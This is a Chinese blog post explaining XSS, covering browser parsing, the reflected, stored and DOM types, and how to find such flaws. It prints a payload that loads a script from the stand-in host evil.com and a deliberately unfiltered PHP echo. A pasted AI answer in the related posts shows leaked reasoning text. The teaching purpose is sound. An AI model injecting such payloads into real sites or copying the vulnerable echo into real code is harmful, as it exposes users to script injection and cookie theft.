什么是XSS

原创 已于 2025-03-24 22:44:27 修改 · 1k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #web安全 #网络安全

于 2025-03-03 00:43:52 首次发布

文章目录

前言

之前对XSS的理解就是停留在弹窗,认为XSS这种漏洞真的是漏洞吗?安全学习了蛮久了,也应该对XSS有更进一步的认识了。

1. 前端知识

现代浏览器是一个高度复杂的软件系统,由多个核心组件协同工作,旨在高效、安全地呈现网页内容并执行交互逻辑。对一般用户来讲,其主要功能就是向服务器发出请求,在窗口中展示用户所选择的网络资源。这里所说的资源一般是HTML文档,也可以是PDF、图片等其他类型。资源的位置由用户使用URI指定。
在这里插入图片描述

说白了,浏览器这个软件,可以通过网络下载资源并展示,主要是一种叫HTML格式文本文档。我们来看一个网页文档:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HTML文档</title>
</head>
<body>
    <p id="p1">The current date and time is:
    <script type="text/javascript">
    	document.write("<script>" + "alert(1)"+ "<\/script>")
      	document.getElementById('p1').innerHTML = new Date()
    </script>
    </p>
</body>
</html>

浏览器的渲染引擎中的核心模块HTML解析器会逐行解析这个HTML文本文件输出内容,遇到<script></script>这个标签时,会将其内的文本交给JavaScript引擎解释执行。如果用户提交的输入(数据)被解析为Js代码(指令),即产生XSS漏洞。

2. 什么是XSS

我们从它的名字开始,Cross-site Scripting,这个scriptinging,应该理解为一个动名词,“脚本+执行”的意思,全部翻译过来就是跨站点的脚本执行。顾名思义就是第三方站点的(恶意的)脚本执行

重点应该是放在scripting-脚本执行上,而不是cross-site -- 跨站上。

  • “跨站”是因为绝大多数XSS攻击都是加载远程/第三方域上的脚本,因为很多时候输入的内容都是有长度限制的。真正的XSS攻击<script>alert(1)</script>弹窗毫无意义,所以攻击代码会比较长,一般会注入类似下面这样的代码来引入第三方遇上的脚本资源
    <script src="http://www.evil.com/xss.js"></script>
  • 脚本执行才是我们根本想要的东西,将我们的“恶意脚本”放在在目标用户的浏览器上执行

上代码:xss.php

$selectChar = $_GET['key']; 	//接收前端提交的数据
/*
可能是数据库查询,又或者是其他业务逻辑
*/
echo $selectChar;				//将来自前端的数据写入响应

最常见的一个场景:搜索框,返回搜索结果的时候通常会显示“xxxx的搜索结果”,如果提交的攻击字符串后端接收后不经过滤直接返回,前端浏览器将该字符串解析为JavaScript代码执行,即产生了XSS。提取用户提交的输入并将其插入到服务器响应的HTML代码中,是XSS漏洞的一个显著特征。如果应用程序没有实施任何过滤或净化措施,那么它很容易受到攻击。

我们用一些Web应用常见的功能点/典型的应用场景,来区分XSS的类型:

  1. 反射型XSS
    搜索框就是一个典型的反射型XSS,用户提交的输入经后端直接返回,造成Js代码执行。
  2. 存储型XSS
    留言板/评论区,用户提交的输入是存储在服务器(不管是内存、数据库还hi文件系统),其他用户请求页面时,留言/评论也会一起加载,造成Js代码执行
  3. DOM型XSS
    DOM型XSS不需要服务器解析响应的直接参与,由DOM(Document Object Model)解析渲染造成Js代码执行。DOM是一套API规范,浏览器实现并提供了DOM API 供网页开发者操作HTML文档。通俗地讲,DOM就是浏览器内置给Js引擎的对象,允许我们对HTML文件中的标签进行增删改查。浏览器通过document对象获取URL中的数据,直接解析为JS代码执行,不需要服务器的参与,就是DOM型XSS。

3. 漏洞挖掘

  1. 在每个输入点提交一个良性字符串
  2. 监控字符串在`响应/页面“中的是否出现及其出现的位置
  3. 对于每个响应,确定显示数据时的上下文
  4. 针对语法上下文尝试引入Js脚本

4. 参考

[1] https://web.dev/howbrowserswork/#The_browser_main_functionality
[2] 《Web前端黑客技术揭秘》
[3] 《黑客攻防技术宝典 Web实战篇》
[4] 小迪安全v2023
[5] deepseek

什么是 XSS 攻击?
m0_38066007的博客
04-23 440
XSS 攻击指的是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。
HTTP系列 干饭人冲啊----XSS攻击?什么是xss攻击
Genus_的博客
01-13 549
什么是XSS攻击 XSS(Cross Site Scripting)攻击是指浏览器中执行恶意脚本(无论是跨域还是同域),从而拿到用户的信息并操作 这些操作一般可以完成下面这些事情: 窃取cookie 监听用户的行为,比如输入账号密码等 修改DOM伪造登录表单 在页面中生成浮窗广告 xss攻击指的是跨站脚本攻击,是一种代码注入攻击,攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息,如cookie等, xss的本质是因为网站没有对恶意脚本进行过滤,与正常代码混合在一起
xss绕过及防护
xiaoheizi的博客
06-29 968
CSP 的实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单。它是后端服务器对cookie设置的一个附加的属性,如果在生成cookie时使用HttpOnly,那么通过js脚本将无法读取到cookie信息,这样能有效的防止xss攻击。页面显示被过滤了尖括号,但是url没有被过滤,闭合input标签输入:">alert("xss")即可弹窗。在网站代码文件中配置:只会在当前代码文件中生效,攻击者无法在该代码文件中获取 cookie。
xss相关知识点
weixin_55021949的博客
07-30 433
xss
Xss基础
weixin_62693307的博客
02-23 505
检测关键字(还是和编码绕过一样,但后台源码中加入了其他的东西,例如strpos函数,这个意思是输入的字符串里面必须要有某些特定的字符(http://)而我们可以把它加上在注释掉就行了)通过广撒网或者其它指定的方式,将存储型xss放在具有xss漏洞的网站上,只要有用户去点击,即可进行攻击,也可以自己去找寻攻击对象,所以攻击范围更广。Xss攻击盗取web终端用户的敏感数据,甚至控制用户终端操作;Xss和sql注入攻击的指令都是由黑客通过用户输入域注入的,但xss注入的是html,而sql注入的是sql命令。
搜索框——不能忽视的XSS漏洞—搜索框所引起的XSS漏洞
06-12
我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用nbsp; ……”这时我才反应过来:“哦,原来如此……”。那时我才知道,在html的输出上代码和内容还是得程序员自己去区分的。
搜索框注入
热门推荐
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
什么是xss攻击?
小伟的博客
04-10 4603
跨站脚本攻击(XSS),英文全称 Cross Site Script   XSS攻击,一般是指黑客通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式   XSS攻击分为三种,反射型XSS、存储型XSS、DOM Based XSS. 了解什么是xss攻击,例子:   本地服务器demo目录下有个index.php,通过提交信息显示在页面上显示数据。   正常情况下:http:localhost/demo/index.php?name=张三,   网页上就会显
什么是xss?
weixin_55539817的博客
08-27 8609
xss原理:xss又叫css,全称跨站脚本攻击。它是指攻击者往web页面或url里插入恶意JavaScript脚本代码且应用程序对用户输入的内容没有过滤,那么当正常用户浏览该页面时,嵌入在web页面的恶意JavaScript脚本代码会被执行,从而达到恶意攻击正常用户的目的。 漏洞的位置:数据交互与输出的地方。 漏洞产生的两个条件:1.用户可以控制的输入点。 2.输入能返回到前端的页面上被浏览器当成脚本语言解析执行。 xss漏洞的...
XSS注入
最新发布
Pudding_2024的博客
05-10 2256
跨站脚本(Cross-Site Scripting,XSS/CSS)是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。本质:前端代码注入XSS的分类1、反射型XSS
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
搜索框反射型xss问题解决(网站开发)
weixin_30567471的博客
01-27 2083
什么是反射型XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等等。利用该漏洞,攻击者可以劫持已通过验证的用户的会话。劫持到已验证的会话后,攻击发起者拥有该授...
不能忽视的XSS漏洞—搜索框所引起的XSS漏洞
T.E.D on Technology
02-22 4974
引子:我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用
什么是SQL注入
weixin_45626840的博客
04-25 1万+
sql注入的原理。 什么是SQL注入? sql注入怎么发生?
如何编写POC/EXP
weixin_45626840的博客
01-10 4051
理解并编写POC/EXP
文件上传-upload-labs
weixin_45626840的博客
10-30 3119
文章目录前言一、文件上传漏洞是什么?二、常见上传检测规则三、绕过靶机包含漏洞类型分类如何判断上传漏洞类型四、第1关五、第2关 前言 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式 一、文件上传漏洞是什么? Web应用程序中,文件上传是一种常见的功能需求,比如用户上传会员头像 如果不对上传的文件进行验证和过滤,攻击者可以通过上传恶意脚本,达到攻击的目的。 二、常见上传.
什么是SSRF
weixin_45626840的博客
03-31 2027
SSRF(Server-Side Request Forgery,服务器端请求伪造)漏洞的本质是:服务器过度信任用户提供的资源标识符(如URL、IP地址等),未严格验证其合法性,导致攻击者可操纵服务器向非预期的目标发起网络请求,从而绕过安全边界,访问或攻击受限资源。核心拆解信任边界失效服务器默认用户提供的目标地址是合法的,未检查其是否符合业务逻辑范围(例如是否属于内网IP、敏感协议或域名)。
什么是XSS攻击?
03-08
<think>嗯,用户问什么是XSS攻击,我需要详细解释清楚。首先,XSS的全称是跨站脚本攻击,属于常见的网络攻击手段。可能用户对网络安全有一定兴趣,或者正在学习相关的内容。我需要从基础开始讲,确保用户理解。 首先,要明确XSS的基本概念,可能用户不太清楚它的工作原理。需要举例说明,比如攻击者在网页中插入恶意脚本,当其他用户访问时,脚本就会执行。这时候用户的cookie可能会被盗取,或者页面被篡改。 接下来,应该分类讲解XSS的类型,比如反射型、存储型和DOM型。反射型例子可以举一个通过URL参数注入脚本的情况,存储型则是恶意脚本存储在数据库里,比如论坛评论。DOM型可能更复杂,涉及前端代码处理不当。 然后,要说明XSS的危害,比如窃取用户信息、会话劫持、钓鱼攻击等。用户可能关心这些攻击的实际影响,所以需要具体举例,比如盗取登录凭证,冒充用户操作。 防御措施是关键部分,用户可能想知道如何防范。需要提到输入验证、输出转义、使用CSP、设置HttpOnly标志等。每个措施要简单解释,比如对用户输入进行过滤,转义特殊字符,内容安全策略的作用。 可能用户是开发者,或者刚入门的安全爱好者,所以语言要通俗易懂,避免过于专业的术语,但也要准确。需要检查是否有遗漏的点,比如XSS和CSRF的区别,但用户只问了XSS,暂时不需要扩展。 最后,总结XSS的重要性和防御的必要性,确保用户理解预防措施的重要性。可能用户需要实际应用的例子,比如在网页开发中如何具体实施转义,或者推荐一些工具和框架。 确保回答结构清晰,分点说明,使用中文,避免使用Markdown,按照系统指令正确使用数学公式的格式(虽然这个问题可能用不到),但保持LaTeX的正确性。检查是否有错别字,语句是否通顺,逻辑是否连贯。</think>XSS攻击(跨站脚本攻击,Cross-Site Scripting)是一种通过向网页注入恶意脚本来攻击用户浏览器的网络安全漏洞。以下是分步说明: 1. **攻击原理** 当网站未对用户输入内容进行过滤时,攻击者可插入如`<script>alert('XSS')</script>`的代码。例如: 若网页通过URL参数`?search=<script>恶意代码</script>`动态显示内容,未过滤的脚本会被浏览器执行。 2. **主要类型** - **反射型XSS**:恶意脚本通过URL参数直接注入,服务器返回包含脚本的页面 $$ \text{URL} \rightarrow \text{服务器} \rightarrow \text{含恶意脚本的响应} $$ - **存储型XSS**:脚本被永久存储(如评论区),所有访问者都会触发 $$ \text{数据库存储} \rightarrow \text{持续影响用户} $$ - **DOM型XSS**:完全由前端JavaScript处理漏洞,如`document.write(location.hash)` 3. **典型危害** - 盗取Cookie:通过`document.cookie`获取会话凭证 - 钓鱼攻击:伪造登录框诱导用户输入密码 - 网页篡改:修改页面内容传播虚假信息 4. **防御措施** - **输入过滤**:对`<`, `>`, `&`等字符进行转义(如`<`) - **输出编码**:根据上下文采用HTML/URL/JavaScript编码 - **内容安全策略(CSP)**:通过HTTP头限制脚本来源 ```http Content-Security-Policy: script-src 'self' ``` - **设置HttpOnly**:防止JavaScript读取敏感Cookie ```http Set-Cookie: sessionid=abc123; HttpOnly ``` 5. **数学建模示例** 设用户输入内容为$U$,过滤函数为$f(x)$,安全显示需满足: $$ f(U) = U' \quad \text{其中} \quad \forall x \in U', x \notin \{\text{危险字符}\} $$ 通过这种分层次的防御体系,可有效阻断XSS攻击链。开发者需在数据处理全生命周期(输入、存储、输出)实施防护措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值